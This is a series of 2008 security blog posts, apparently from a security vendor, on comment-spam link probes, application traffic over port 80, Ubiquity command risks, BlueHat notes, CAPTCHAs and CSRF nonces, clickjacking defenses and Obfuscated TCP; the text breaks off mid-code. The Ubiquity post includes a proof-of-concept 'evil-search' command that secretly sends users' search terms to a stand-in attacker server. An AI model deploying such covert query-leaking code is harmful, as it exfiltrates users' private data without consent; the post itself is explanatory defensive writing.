Friday, October 31, 2008

First encounters with a web comment spammer

Jeff Forristal here. I run a couple of personal web sites that host the usual gamut of material found on personal web sites (pictures of my kids and family, my latest favorite LOLcat graphic, etc.). Recently I updated one of my sites and added a new comment/contact submission form so I wouldn’t have to expose my email address for spam harvesters to find. A mere few hours after enabling this new comment submission form on my web server, I started to get some comments; unfortunately they were all comment spam.

Of course, web comment spamming has become yet another fact of life on the Internet. Blogs and forums with unmoderated/open comment submission functionality are quickly getting clogged with random and off-topic spam. Basically the spammers are taking the content they would normally send you in email, and now posting it to web site forums and blogs too. This is why comment moderation and CAPTCHAs are becoming the norm for forum and blog comment posting.

Anyways, there is nothing all that exciting about receiving spam of any variety. However the nature of the comment spam I received caught my eye. Over the course of a few weeks, I received multiple comment spams that all had the same format, but different random values.

Two examples of the comment spam I received were:

Email: cdbiib@orhabg.com
Comment:
jJsAdx <a href="http://aereogakjvpd.com/">aereogakjvpd</a>, [url=http://ubfcdpkfggto.com/]ubfcdpkfggto[/url], [link=http://wiogiusmvjcz.com/]wiogiusmvjcz[/link], http://ejmugotxbmqc.com/


Email: thowea@snkkjo.com
Comment:
fHwI3w <a href="http://uwtsayqpclib.com/">uwtsayqpclib</a>, [url=http://wetpnicpwkfd.com/]wetpnicpwkfd[/url], [link=http://bvtyjneqigek.com/]bvtyjneqigek[/link], http://prcghesjscpl.com/

We can make an educated guess that this comment submission isn’t directly about blindly shoving links onto sites in order to bolster incoming link counts (inflating PageRank ratings and aiding in SEO efforts), because all the links are random and don’t reference real sites. The submitted data has no practical value in itself, except as a probe to see what comes out the other side of the submission process. The data contains four different link formats (an actual HTML <A> tag, two flavors of popular bulletin board markup tags, and a raw URL), and perhaps a fifth if you count the email address. That makes me believe the end goal was probably to find a way to inject a clickable link of some sort. Had the action been successful, perhaps the same software would have then tried to inject more meaningful links (back to our SEO theory). Or perhaps this was just a precursor scouting application compiling a list of URLs known to allow arbitrary link injection (such lists are commonly paired or sold with spamware/crimeware apps used to inject content onto listed sites already known to be open to receiving the injection).
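The probe format is regular enough that you could imagine flagging it automatically. Here's a minimal JavaScript sketch; the regular expressions are my own approximation of the observed pattern, not anything recovered from the spammer's tool:

```javascript
// Flag comments matching the four-link probe format described above.
// The pattern (5-8 char random token, then HTML/url/link/bare-URL styles,
// all pointing at random .com hostnames) is my own approximation.
function looksLikeLinkProbe(comment) {
  var hasToken    = /^[A-Za-z0-9]{5,8}\s/.test(comment);
  var hasHtmlLink = /<a\s+href="http:\/\/[a-z]{8,16}\.com\/?">/i.test(comment);
  var hasUrlTag   = /\[url=http:\/\/[a-z]{8,16}\.com\/?\]/i.test(comment);
  var hasLinkTag  = /\[link=http:\/\/[a-z]{8,16}\.com\/?\]/i.test(comment);
  var hasBareUrl  = /,\s*http:\/\/[a-z]{8,16}\.com\/?\s*$/i.test(comment);
  return hasToken && hasHtmlLink && hasUrlTag && hasLinkTag && hasBareUrl;
}
```

Requiring all four link styles at once keeps the false-positive rate low; a legitimate commenter is unlikely to produce that exact combination.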

Of course, being the curious individual that I am, I started to wonder:

  • The app managed to put something resembling an email address into the email field. Now, sure, the form field name was ‘email’, so it wouldn’t be that hard to deduce; what would happen if I named that field something less obvious ('mail', 'eml', 'e', 'foo')?
  • The links were submitted in a textarea field; will it submit the same type of data in a more constrained input text box?
  • Will it try to inject content into other identifiably named fields, such as 'phone', 'address', 'url', etc.?
  • Does the app support cookies? Is it a well-behaved web user agent? How smart is it?
  • Can the app's injection logic handle multi-step submissions, where you submit to one page/place and the data eventually appears on a different page/place but not within the actual submission response (think: you submit a comment, you get a page that says "thank you", but then have to click one more link before you get to where your comment is actually displayed)?
  • And of course, the million dollar question: what would have happened had their injection succeeded and produced a clickable link?

I’m not one to leave such important questions burning on my mind (heh), so I came up with a plan to get the answers I want. I will lay a trap for the comment spammer (or rather, their app). The idea is simple: through the magic of some server-side logic, I will detect when this comment spamming app is making submissions to my forms (assuming they come back in the future; but historically they seem to visit me on a fairly regular basis, so it seems a safe assumption). Rather than display the usual "thank you for your submission" response, I’ll instead feed a specially crafted response to make it seem like the submission actually produced a clickable link (making me look vulnerable). Further, I will then flag that session/IP as a spammer, and all subsequent requests will result in some extra forms being added to the web page responses. Those forms will be designed with certain characteristics meant to gauge the effectiveness and operation of the application and its web crawler; I’m assuming the app will repeat its typical injection testing process for as many forms as it encounters.
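To make the plan concrete, here's a rough JavaScript sketch of the trap logic described above; the function names, field names, and response strings are all my own invention:

```javascript
// Sketch of the honeypot: flag probing IPs, fake a "vulnerable" response,
// then decorate later pages with instrumented forms. Purely illustrative.
var flaggedSpammers = {};  // IP -> true, once a probe-style submission is seen

function handleCommentPost(ip, comment, isProbe) {
  if (isProbe) {
    flaggedSpammers[ip] = true;
    // Pretend the injection worked: echo the submitted markup back as-is,
    // making the site look vulnerable to arbitrary link injection
    return "<p>Thanks for your comment!</p>" + comment;
  }
  return "<p>Thank you for your submission.</p>";
}

function decorateResponse(ip, html) {
  if (!flaggedSpammers[ip]) return html;
  // Append extra forms with varied field names and constraints to gauge
  // how the bot's injection logic behaves
  return html +
    '<form action="/c1"><input name="eml"><textarea name="comment"></textarea></form>' +
    '<form action="/c2"><input name="foo"><input name="comment" maxlength="40"></form>';
}
```

A real implementation would persist the flag server-side and vary the forms across requests, but the shape of the experiment is the same.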

So if all goes according to plan, I intend to post a follow-up to this aptly titled article in a few weeks. The follow-up will of course be entitled "Second encounters with a web comment spammer."

Until then!
- Jeff


Tuesday, October 28, 2008

Ports Are Meaningless

I read an interesting survey today commissioned by FaceTime Communications. This is their fourth such annual report and while the overall findings were unsurprising, it highlights a growing problem - how to control application use as traffic converges on ports 80 and 443. The survey found that employee use of collaborative Internet applications is on the rise and that employees use such applications for personal benefit on company time - no surprise there. This has in turn led to security, bandwidth utilization, compliance and data leakage issues. Some of the more interesting findings are below:
  • 97% of employees utilize 'Internet Applications', defined as IM, P2P, streaming media, collaboration (web conferencing, blogging and social media), VoIP, anonymizers, web mail, etc.
  • 86% use IM
  • 54% use file sharing
  • 69% use VoIP
  • 15% use anonymizers
These statistics are important as they emphasize the increased use of applications that are often not sanctioned or monitored by internal IT, yet can significantly impact the corporate LAN. The larger the attack surface, the more vulnerable a platform becomes. Installing additional applications to a desktop system increases the likelihood that one such application will be vulnerable and open to attack, especially when these applications are not regularly patched. Moreover, such apps can represent costly bandwidth utilization and potential data leakage risk.

Why is it that the use of non-sanctioned applications is on the rise? Have internal security teams given up the fight and handed over desktop control to end users? No. The reality is that end users no longer need admin rights to utilize alternate applications. Why? Many are now web based. You don't need to install a desktop application on your machine, you only need to point your web browser to a Rich Internet Application and any of the aforementioned application categories are readily available online.

What the report did not cover is what form this traffic takes, how it can be identified and how it can be controlled. A decade ago, network firewalls ruled the security landscape. Preventing access to a particular application/protocol was as simple as blocking a known port. Don't want employees to send files? No problem, block outbound port 21. Telnet? That's port 23. Today however, ports are meaningless. Traffic is converging on ports 80 and 443 for a simple reason - they're always accessible, on any network.

Applications are becoming 'network aware'. They may have a preference for their communication protocol but they will find a way out and their fallback plan is always the web. Take a look at applications such as Skype, Tor or virtually any modern P2P application. If you block all other means of egress, you will find traffic being tunneled through port 80. When this occurs, ports become meaningless and sysadmins suddenly have their hands full. Today, security solutions designed to hand control back to administrators must understand the language spoken by applications in order to pick it out within the sea of legitimate web traffic. Moreover, vendors must constantly monitor and update their signatures as the traffic patterns are continually changing in order to bypass known controls. Just as we've accepted the arms race between virus writers and AV vendors, we now have an arms race between those seeking to make applications accessible to all and the enterprises seeking to control them.
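To illustrate what "understanding the language spoken by applications" means in practice, here's a toy JavaScript classifier over raw payload bytes. The signatures below are invented for the example (the BitTorrent handshake prefix is the one documented exception); real products maintain far larger, constantly updated pattern sets:

```javascript
// Toy signature-based classification of traffic seen on port 80.
// Real inspection engines look far deeper than these surface patterns.
var signatures = [
  // Genuine HTTP request line
  { app: "http", test: function (p) { return /^(GET|POST|HEAD) \S+ HTTP\/1\.[01]/.test(p); } },
  // BitTorrent handshake: 0x13 followed by the protocol string
  { app: "bittorrent", test: function (p) { return p.indexOf("\x13BitTorrent protocol") === 0; } },
  // Opaque binary data where a browser request should be
  { app: "unknown-binary", test: function (p) { return /[\x00-\x08]/.test(p.slice(0, 8)); } }
];

function classifyPayload(payload) {
  for (var i = 0; i < signatures.length; i++) {
    if (signatures[i].test(payload)) return signatures[i].app;
  }
  return "unclassified";
}
```

The point is that the port number appears nowhere in the logic; the decision is made entirely from what the traffic says, not where it says it.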

- michael

Tuesday, October 21, 2008

Ubiquity Foreshadows Future Browser Security Challenges

When I can, I like to investigate emerging open source projects, both to satisfy my curiosity and to gain insight into security challenges to come. I recently stumbled across one such project from Mozilla Labs, known as Ubiquity. The project is described as "an experiment into connecting the Web with language". In a nutshell, it is a Firefox extension which extends browser functionality via natural language queries. When a user invokes Ubiquity via a keyboard shortcut, a text box is displayed where the user can input simple queries and the requests/responses can interact directly with the browser. Let's look at an example:

Access Ubiquity - On my Mac, by default this can be done via Alt-Space

Enter a command - I type "map 1600 Pennsylvania Avenue, Washington DC" as seen in the image to the left. Note that in addition to retrieving a map, in the lower right hand corner of the image there is an 'Insert map in page' link. Clicking on this will automagically embed the map into an editable section of the page that you're on. This is handy, for example, for embedding maps into webmail messages.

Big deal. Google Maps has been around for years. Why should I care that a plugin has been built to make it easier to look up maps?

Why Ubiquity Changes the Security Landscape

Extensibility - Anyone can develop Ubiquity commands and it's easy to do so. Once a new command has been created, you can deploy it simply by linking to the code on a web page. The Ubiquity extension will recognize the code and prompt users to add the new command. As the Ubiquity user base grows, this certainly streamlines social engineering attacks. While such extensibility is similar to what can be done today with browser extensions, Ubiquity commands can be developed much more quickly and are just as powerful.

Interaction - The Ubiquity query window isn't just a new browser window. Commands have the ability to directly interact with your browser. For example, the built-in email command interacts with your Gmail account (assuming you're authenticated) and allows you to query email addresses from your contacts. This is certainly handy and allows for great interactive Ubiquity commands to be built, but could certainly be abused. How about a rogue Ubiquity command which silently forwards your contact list to a spam bot?

Remote Updates - The authors of new commands can make changes on the fly and the next time the command is called, Ubiquity will use the updated logic. End users do have the ability to accept automatic updates when they first subscribe, but assuming they do, this provides a great Trojan Horse for a less than honest author. They could publish a useful command, wait until it's widely deployed and then change the logic. Take for example the evil-search function which I've published, the code for which is below:

CmdUtils.CreateCommand({
  name: "evil-search",
  description: "Searches Yahoo! (...and lets me know what you search for...)",
  help: "Try issuing 'evil aglet'",
  icon: "http://www.yahoo.com/favicon.ico",
  takes: {"word": noun_arb_text},
  execute: function( directObj ) {
    var word = directObj.text;
    // Legitimate behavior: open the Yahoo! search results for the query
    Utils.openUrlInBrowser( "http://search.yahoo.com/search?p=" + escape(word) );
    // Malicious behavior: silently leak the same query to a second server
    Utils.ajaxGet( "http://localhost/search?p=" + escape(word) );
  },
  preview: function( pblock, directObj ) {
    var word = directObj.text;
    if (word.length < 1) return;
    pblock.innerHTML = "Searches Yahoo! for the provided search term " +
      "(...and lets me know what you search for...).";
  }
});


This simple Ubiquity command integrates Yahoo! search functionality. When used, the user will be redirected to a web page displaying results for their query. However, behind the scenes, a second AJAX query is made to an attacker controlled server (left as localhost for illustrative purposes). To see this in action, subscribe to the command, run an evil-search query and check the log files on your local server. A command such as this could be used to keep tabs on searches queried by other users. This is a very simple example. With the power offered by Ubiquity, the sky's the limit.

Challenges/Solutions

To be fair, this is a beta project and the team fully admits that security issues will need to be addressed. That said, at present they appear to be pursuing two paths to address the security implications.

End User Warnings - When subscribing to a new Ubiquity command, the user is presented with a big, bold warning letting them know (literally) that evil commands could do anything that they want, including steal credit card information. Warnings such as this are, in my opinion, useless (I'm talkin' to you Vista). Relying on end users to determine if something is safe doesn't work as most users don't have the skills to make that determination.

Social Trust Network - The current Ubiquity warning message indicates a plan to create a Social Trust Network, whereby users will rely on others to determine if a command is safe. This doesn't fix the problem, it just spreads it out. The approach still relies on users to determine if a feature is safe and, given the remote update capabilities of Ubiquity commands, even if a million people agree that a command is safe today, it could be evil tomorrow. If anything, such a network could provide a false sense of security.

In my opinion, the only viable way to secure such a system is to inject a review process. Yes, this reduces the openness of the project and yes this isn't foolproof but people with security expertise and knowledge of Ubiquity need to be involved and that puts the burden squarely on the shoulders of Mozilla. I liken it to malicious Google gadgets, which Google claims to test for vulnerabilities. In a world of mashup technologies, where functionality, not just content, can be created by anyone, a central authority must take responsibility for protecting end users.

Ubiquity is a great project and I hope that it succeeds. I just hope that better security is implemented before this project goes prime time.

- michael

BlueHat v8 After-Thoughts

Hello everyone, Jeff Forristal here. Last week I ventured over to Redmond to attend BlueHat v8. For those of you unfamiliar with BlueHat, it's Microsoft’s security conference that they put on for their internal developers (and select partners/third-parties). This year was slightly different than years past, as none of the talks were under NDA. I heard the recorded talks may wind up on Microsoft Technet as public on-demand webcasts, but they haven’t been released to date.

Anyways, I thought I would give you a few interesting highlights and some food for thought. The first comes from the "Crimeware: Behind the scenes" talk given by Iftach Amit of Aladdin. Basically the moral to his story is simple: malware is now a business. There is real money to be had; we are no longer dealing with bored teenagers who make viruses simply because they can (well, they are still around too, but they are hardly the majority threat anymore). There is now financial incentive to make better malware, and thus I suspect we are going to start seeing more creative malware tactics in the future. But there were two interesting things I want to point out (derived from information Amit presented). First, the crimeware/malware business model contains strong parallels to online advertising business models—syndication by smaller sites from a large distribution agency, high-value placements on popular/busy web sites, and impression/click tracking. Other than substituting a piece of malware for an ad, it seems everything else is virtually identical between the two models...right down to the tools used, payment relationships, pricing structures, etc. Second, Amit mentioned that his company recovered a log file from a crimeware server that had 200,000+ web site FTP credentials in it. Think about that: 200,000 legitimate web sites that the attackers could arbitrarily change and introduce malware to. This really calls into question the value of web site reputation systems, if reputable websites can be switched over to host malware at a moment's notice. It really doesn't matter if the site was angelic yesterday (or an hour ago) because it can be evil today. Real-time classification and scanning seems to be the burgeoning practical solution.

I was having a discussion with Dave Weinstein, a Microsoft senior security developer, and he made a really good point: making an arbitrary guess, how many competent security experts are there in the world? 5000? He noted that Microsoft alone had ten times that many developers on staff (which I can’t confirm, but I can confirm Microsoft reporting 85,000 certified application developers as of September 2008). It's probably a safe guess to say the number of developers in the world measures in the millions. Overall, this is a really important correlation: the number of developers in the world outnumbers the number of security experts by a seriously significant factor. There simply isn't enough security expertise to go around, and so there needs to be investment in making security as distilled and accessible to developers as possible. Mind you, the goal is not to turn developers into security experts...they already have their skill specialty (development), and we should not force them to be dual-specialists (it's just not going to happen for the vast majority). Developers need simple steps and processes for dealing with security that do not require them to be versed in the particulars of security. Which brings me to the second day of BlueHat v8, focused on Microsoft's Security Development Lifecycle.

The day was kicked off with some perspectives on threat modeling. Now, I've done my fair share of threat modeling, and I often find it technically repetitive and numbingly demanding of small nuances to the point of de-motivating me from wanting to do it again. And yet, I was a bit inspired by the way Danny Dhillon described how EMC distilled the threat modeling process to the bare essentials, thus making it more manageable for the average developer. They actually managed to move threat modeling towards a "list of checkboxes" model...which we all know scales much better than an open-ended "just think of all the bad things someone could do to your app" thought exercise. Adam Shostack from Microsoft also demo'ed Microsoft's new version of their internal threat modeling tool—which they plan on releasing to the public eventually (November 2008, if all goes according to plan). It's cool and nifty, but personally I'd really like to get my hands on the EMC tools.

Later in the day a gaggle of Microsoft engineers gave a presentation on the use of fuzzers within Microsoft. I didn't know Microsoft had embraced fuzzers to the level that they have--apparently they have internal SDL mandates to file-format fuzz anything that can read a file...and that encompasses over 300 different file parser components in Vista alone. There is a lot of public opinion among security experts dismissing fuzzing, but I believe that's purely because of fuzzing's no-expertise-required approach and lack of sexiness. The basic fact is that fuzzing, when done correctly, is a simple and inexpensive way to flush out bugs--and it's something that non-security developers can wield and understand. Plus you have to keep in mind that some enterprising hacker type will probably use a fuzzer against your product eventually, so you might as well find the problems before they do. Anyways, Microsoft has committed a lot of internal resources into really streamlining the fuzzing process. They've developed a significant internal suite of fuzzing tools, and they've even done long-term research to determine where the point of diminishing returns lies for their fuzzing efforts. It doesn't seem likely that Microsoft will ever release their fuzzing tools to the world, but it shouldn't be difficult for other organizations to adapt Microsoft's methodology to the plethora of publicly-available fuzzers. A good place to start would be the book Fuzzing: Brute Force Vulnerability Discovery by Zscaler’s own Michael Sutton (I felt obligated to make a shameless plug on his behalf :).
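For readers who haven't seen a fuzzer before, the core idea fits in a few lines of JavaScript. This is a deliberately tiny mutation fuzzer sketch of my own; Microsoft's internal tooling is vastly more sophisticated:

```javascript
// Minimal mutation fuzzing: flip random bits in a known-good sample file
// and feed each mutant to the parser under test.
function mutate(bytes, flips, rand) {
  var out = bytes.slice();  // copy the valid sample (array of byte values)
  for (var i = 0; i < flips; i++) {
    var pos = Math.floor(rand() * out.length);
    out[pos] = out[pos] ^ (1 << Math.floor(rand() * 8));  // flip one bit
  }
  return out;
}

function fuzz(sample, parser, iterations, rand) {
  var crashes = 0;
  for (var i = 0; i < iterations; i++) {
    try { parser(mutate(sample, 3, rand)); }
    catch (e) { crashes++; }  // a thrown error stands in for a real crash
  }
  return crashes;
}
```

In a real harness the "parser" is the target application run under a debugger, and every crash gets triaged for exploitability; but the loop itself really is this dumb, which is exactly why non-security developers can run it.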

Overall, BlueHat v8 was a great time (as always). The chance to hobnob with other industry security experts and leaders always yields some insightful takeaways. Personal thanks to everyone at the BlueHat conference...organizers, speakers, and attendees...for making it a pleasant and engaging opportunity to mingle with security-minded peers.

- Jeff

Wednesday, October 15, 2008

Plotting the Death of CAPTCHAs

I hate CAPTCHAs. No, I really hate CAPTCHAs.

CAPTCHA stands for "Completely Automated Public Turing test to tell Computers and Humans Apart", an acronym coined by Luis von Ahn (Carnegie Mellon University), Manuel Blum, Nicholas J. Hopper (Carnegie Mellon University) and John Langford (IBM) in 2000. CAPTCHAs were used initially by web email services to prevent spammers from automating account creation but are now used by a variety of web applications and are also leveraged as a control to prevent Cross Site Request Forgery (CSRF) attacks. In plain English, CAPTCHAs are those truly annoying, psychedelic images of words and phrases which end users are supposed to be able to easily interpret while computers can't. The problem - they don't work - on either front.

Now I like to think of myself as a reasonably intelligent person. After all, I made it through school and can even complete the first level of Super Monkey Ball. That alone has to place me above average in the gene pool, right? However, when it comes to CAPTCHAs, I'm definitely CAPTCHA impaired. I can't tell you the number of times that I've failed a CAPTCHA test, but forget about me, I'm not the average web surfer anyway. My test for the user friendliness of any good security control is simple - will it be transparent for my Mom? Keep in mind that this is a woman who still owns a VCR which continues to flash '12:00' in her living room. Let's look at a few CAPTCHAs to see if Mom will be able to handle them.

Ticketmaster
Now this one isn't too bad. I can read the words 'views wells mr and' but does capitalization count? What about that period before the word 'and'?

Verdict: Mom will ultimately get this one, but only after a phone call to me and that's long distance, so that's unacceptable.

Gmail

Hmmmm....could be 'malcurun', 'malairim' or something in between. Let's go to the dictionary...oh wait, whatever it is, it's a made up word, no help there.


Verdict: This one will definitely throw Mom for a loop.

Windows Live
Is that a 'K' or an 'I' dating a pregnant 'L'?



Verdict: Not gonna happen.

Facebook
Whoa. I'm not even going to guess at that first word.



Verdict: There's no way that Mom's going to get this one either but she (and I) shouldn't be using Facebook anyway so we'll give this one a pass.

Now if visual CAPTCHAs aren't your forte, or if you're visually impaired, the propeller heads behind this user friendly security control also have audio CAPTCHAs. For example, since I didn't like the Ticketmaster CAPTCHA above, Ticketmaster also made an audio file available. Now I don't know about you, but that sounds to me like a crew of monotone people partying in a tunnel and randomly throwing out numbers - not much better.

Now I've argued why CAPTCHAs fail in their goal to be user friendly, but they also fail in preventing and detecting automation. An article published yesterday by MIT's Technology Review discusses how CAPTCHAs are improving AI as researchers continually work to beat various CAPTCHA schemes. I'm not sure that CAPTCHAs can take credit for assisting our leap into the future but it does illustrate the arms race that will continue. No matter what CAPTCHA scheme is devised, it will ultimately be defeated. Microsoft, Google and Yahoo! have all been forced to change their CAPTCHA technologies after it was revealed that automated attacks had broken their schemes. However, this arms race is rather pointless so long as economics allow for a profit to be made by employing workers in third world countries to interpret CAPTCHAs. It's a bit depressing to learn that uneducated workers are apparently not CAPTCHA impaired.

Alternative Approaches

There are other, user friendly ways to gain confidence that human beings are sending requests as opposed to computer scripts and the answer isn't building a better mouse trap. Variations of CAPTCHAs such as audio files, puzzles, photos, animation, etc. are just as flawed. They aren't user friendly and they too will ultimately be broken. So what can you do?

Take it offline
If your goal is to gain assurance that a human being is involved in the process, take the challenge/response offline. Require that the user respond to an email message, text message or if you really want to be sure, a phone call.

Ask Questions
Ask a question that the user should know but an automated script wouldn't have the intelligence to respond to.

Nonce Values
If you're using CAPTCHAs to prevent CSRF, stop it. CAPTCHAs, beyond all of my previous arguments, rely on human beings, the weakest link in any security chain. Just because you throw a CAPTCHA at a person to ensure that they intervene before doing something stupid like transferring funds, doesn't mean that they won't do it. After all, we've been trained to (try to) answer CAPTCHAs when they're presented. CAPTCHAs have turned us into the digital equivalent of Pavlov's dog. A better alternative is to inject a nonce, or one-time value, into web forms so that receiving pages can confirm that the request came from the appropriate web form, not from pre-populated values in a spam email link. OWASP projects such as J2EE CSRFGuard, .Net CSRFGuard and the OWASP Enterprise Security API can assist with this.
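The nonce pattern is simple enough to sketch in a few lines of JavaScript. This is an illustrative shape, not production code (real implementations use cryptographically strong randomness and per-session storage, as the OWASP projects above do):

```javascript
// CSRF-nonce sketch: issue a one-time token with the form, then require
// and invalidate it on submission. Names and storage are illustrative.
var issuedNonces = {};  // nonce -> true; per-session server state in a real app

function issueNonce(rand) {
  var nonce = Math.floor(rand() * 0xffffffff).toString(16);
  issuedNonces[nonce] = true;
  return nonce;  // embed as <input type="hidden" name="csrf_nonce" value="...">
}

function verifyNonce(nonce) {
  if (!issuedNonces[nonce]) return false;  // missing, forged, or replayed
  delete issuedNonces[nonce];              // one-time: a replay now fails
  return true;
}
```

Because the attacker's pre-populated spam link can't know the nonce embedded in the victim's freshly served form, the forged request fails verification without the user ever being interrupted.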

Can the aforementioned alternatives be bypassed? Of course, but let's keep our goal in mind. Security, especially in services targeted to the general public, must remain as transparent as possible. There is no such thing as bullet proof security, only security that mitigates risk to an appropriate level. Is security an appropriate argument for driving customers away? I don't think so.

It's time for CAPTCHAs to die. If for no other reason, it will make me (and my Mom) happy.

- michael

Thursday, October 9, 2008

Clickjacking Defenses

[Update: 10/15/08 - Adobe Flash Player 10 is now available for download, which addresses the webcam/microphone hijacking scenario described below.]

Since I last blogged about clickjacking two days ago and posted a demo, plenty of additional information has emerged, including the original researchers, Jeremiah Grossman and Robert Hansen, breaking their silence in light of attack details now being public. Robert provides a detailed list of the status of all known clickjacking related issues, noting whether they have been resolved or if resolution is expected in the near future.

Given that the majority of necessary vendor patches to address clickjacking are not yet available, I'd like to take this opportunity to discuss some practical interim workarounds to defend against clickjacking. Keep in mind that while clickjacking affects a web user, as with most client side vulnerabilities, preventing the attack is a shared responsibility among web site administrators, software vendors and end users. We don't have any control over software vendors, so I'll instead focus on what website administrators (server side) and end users (client side) can do to protect themselves.

Server Side Protections
  • Frame busting - All of the clickjacking demonstrations that I've seen to date require that the targeted site, which the attacker wants a victim to click on, be contained in an IFRAME on a page which the attacker controls. According to Robert, the need for IFRAMEs can be bypassed using ActiveX controls if they don’t use traditional modal dialogs, but rather rely on on-page prompting. However, inserting 'frame busting' code on sensitive pages is at least one solid protection that site administrators can implement to prevent their clients from falling victim to clickjacking attacks when the attacker is using IFRAMEs. The following code will ensure that a page is not displayed within an IFRAME:
<script type="text/javascript">
  if (top.location != location) {
    top.location.href = document.location.href;
  }
</script>
  • Randomize URLs - Clickjacking requires that the URL of the site to be clickjacked is known. Therefore, URLs for pages with sensitive actions (e.g. password reset) could be dynamically generated. This would of course prevent static links from other applications.
  • Randomize Layout - Clickjacking also requires knowing the location of the object to be clicked on so that the overlay page is properly positioned. Therefore, randomly changing the position of a sensitive page element such as a submit button would increase the level of difficulty for a successful clickjacking attack. This however could be challenging for many sites as page layout can't be adjusted without changing the overall look and feel of the page.
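As an aside on the "Randomize URLs" suggestion, here's a minimal JavaScript sketch of what a dynamically generated sensitive URL might look like; the path layout and token length are invented for illustration:

```javascript
// Generate an unguessable path segment for a sensitive action each session,
// so an attacker can't pre-frame the URL in their overlay page.
function randomToken(rand, length) {
  var alphabet = "abcdefghijklmnopqrstuvwxyz0123456789";
  var token = "";
  for (var i = 0; i < length; i++) {
    token += alphabet.charAt(Math.floor(rand() * alphabet.length));
  }
  return token;
}

function sensitiveUrl(rand) {
  // e.g. /account/password-reset/k3x9q0ab2c7f8d1e5g6h4j2m/submit
  return "/account/password-reset/" + randomToken(rand, 24) + "/submit";
}
```

The server would bind the token to the session and reject any other path, which is exactly why static links from other applications stop working under this scheme.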

Client Side Protections

One of the most concerning attacks related to clickjacking involves changing a user's Adobe Flash Player settings to allow the attacker's site to enable and access a victim's webcam and microphone. This allows clickjacking to be used for surveillance as seen in a demonstration video posted at guya.net. The Adobe Flash Player mitigations in the list below are therefore designed to address this specific attack but keep in mind that Adobe is only one affected vendor.
  • Pull the plug - The only sure fire way to prevent your webcam and microphone from being hijacked is to disable them. This of course has the obvious implications of killing hardware that will be useful elsewhere but you may want to consider it. Depending upon your system this may require changing O/S settings, BIOS settings or simply pulling the plug.
  • Adobe Flash Player Settings Manager - Flash Player settings can be adjusted manually. In fact, the aforementioned attack is doing exactly this by tricking the user into changing their settings via clickjacking. In order to access the appropriate settings you can right-click on any embedded Flash video and select 'Settings --> Advanced' or just use the links below.
    • Global Privacy Settings - Global settings address all sites using Flash, regardless of whether they are newly encountered or already have site specific rules applied from past visits. Select 'Always Deny' to ensure that sites can never access your webcam or microphone. Keep in mind however that this setting can be clickjacked so it's far from a foolproof defense.
    • Website Privacy Settings - This panel will allow you to set rules for specific sites if you'd prefer to not block access for all sites.
  • mms.cfg - According to the Adobe advisory, in addition to the method above, webcam and microphone access from within Adobe Flash Player can also be disabled by changing the configuration file directly. This is a better approach as this change cannot be reset through clickjacking. Directions for doing this are provided on page 57 of the Adobe Flash Player Administration Guide, but based on my research, the mms.cfg file is only used by Adobe Flash Player 8, and not in 9.
  • NoScript - NoScript is a handy Firefox plugin which permits granular control over client-side scripting on websites, and it has some decent XSS protections as well. Its developers have extended this functionality to defend against clickjacking in the following three ways.
    • ClearClick - ClearClick will prevent UI interaction with embedded objects if they're obstructed or not clearly visible.
    • Opacize Embedded Objects - This setting makes visible those page elements that have been hidden by setting their CSS opacity value to '0'. This is, in my opinion, the best defense to date, as it won't break the functionality of any sites but will empower the user to see clickjacking attempts.
    • Frame Breaker - Additionally, NoScript has frame breaker emulation for frames where JavaScript is disabled.
While the NoScript functionality is a positive step forward in the absence of vendor patches, I'll forewarn you that I've encountered some false positives in my testing thus far. My recommendation is to enable ClearClick only for Trusted Sites, but use the Opacize Embedded Objects setting for both Trusted and Untrusted Sites to maximize coverage while minimizing false positives. To summarize, there is no silver bullet to protect against clickjacking, but there are at least a handful of steps that can be taken to mitigate the risk.
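For reference, the mms.cfg change described above amounts to a one-line directive. Per the Adobe Flash Player Administration Guide, the AVHardwareDisable setting blocks camera and microphone access entirely (the file's location varies by operating system):

```
# mms.cfg - Flash Player administrative configuration file.
# Setting AVHardwareDisable to 1 prevents SWF content from
# accessing the webcam and microphone, so the setting cannot
# be clickjacked back on through the Settings Manager UI.
AVHardwareDisable = 1
```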

As with most problems in life, if the aforementioned still leaves you with worries, a little duct tape can solve your problems - this time by being placed over your webcam.

- michael

Wednesday, October 8, 2008

The Obfuscated TCP project

Hello, Jeff Forristal here. In my last post I talked about the desire of some folks to use SSL for encryption purposes but forego the authentication components (via the use of self-signed SSL certificates). Overall it’s not a very good idea, since removing authentication from the process renders the benefit of the encryption moot for all but the most trivial (and lazy) threat vectors (passive eavesdropping).
So earlier this week I ran across a mention of the Obfuscated TCP project (a.k.a. ObsTCP), developed by Adam Langley of Google. The project is self-described as:
Obfuscated TCP is a transport layer protocol that adds opportunistic encryption. It's designed to hamper and detect large-scale wiretapping and corruption of TCP traffic on the Internet.
This sounds like an ideal potential alternative for all of those who wish for an 'encryption without (expensive public CA certificate-based) authentication' solution. The ObsTCP idea is simple: use lightweight and fast encryption functions to obfuscate all TCP data streams, in an effort to thwart passive eavesdropping. Processors are fast enough these days that the additional overhead of the data obfuscation is negligible. And (from my interpretation of the project’s documentation), the idea isn’t to be a cryptographically secure transport and/or replace SSL…it’s just to obfuscate TCP data enough to make passive eavesdropping difficult. We are already seeing similar approaches deployed via P2P clients to bypass ISP throttling based on packet/protocol inspection; the obfuscation employed isn’t robust enough to survive a targeted cryptographic attack, but it is enough to make high-speed protocol detection and classification difficult. The project has produced a video (hosted on YouTube) that goes over the basic goals and the reasoning behind them.
Looking at the project's history, the original intent seems to be for ObsTCP to be added into the TCP/IP protocol stack (ISO layer 4) for transparency. However, apparently the ObsTCP project approached the IETF with a draft, and, ... well ..., it got a chilly reception. So ObsTCP changed gears and instead moved up the stack to the application layer (ISO layer 7), and is now focusing on HTTP as their first high-value protocol target. So the original project description of ObsTCP being a "transport layer protocol" is a bit misleading when considered in the context of the project's new implementation direction.
So how does ObsTCP work? Well, it requires an ObsTCP-capable client and server. The server admin essentially embeds the server's public key (and some meta information) in a DNS entry related to the server. The client retrieves the server's public key, opens a connection to the ObsTCP port of the server, and then uses a Diffie-Hellman key exchange to negotiate a key for subsequent encryption. Right now the project is offering proof-of-concept patches for the Firefox browser and the Apache and lighttpd web servers to make them ObsTCP-capable. They also offer an ObsTCP-to-normal-TCP proxy which can be placed in front of TCP services to make them ObsTCP-capable.
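To illustrate the key negotiation step, here is a toy Diffie-Hellman exchange in Python. The group parameters are deliberately tiny and purely illustrative (the actual project uses its own, much stronger primitives), but the shape of the exchange is the same: each side combines its private value with the other's public value to arrive at a shared key, and the key itself never crosses the wire.

```python
import secrets

# Toy Diffie-Hellman parameters; a real deployment would use a
# standardized large prime group or an elliptic curve.
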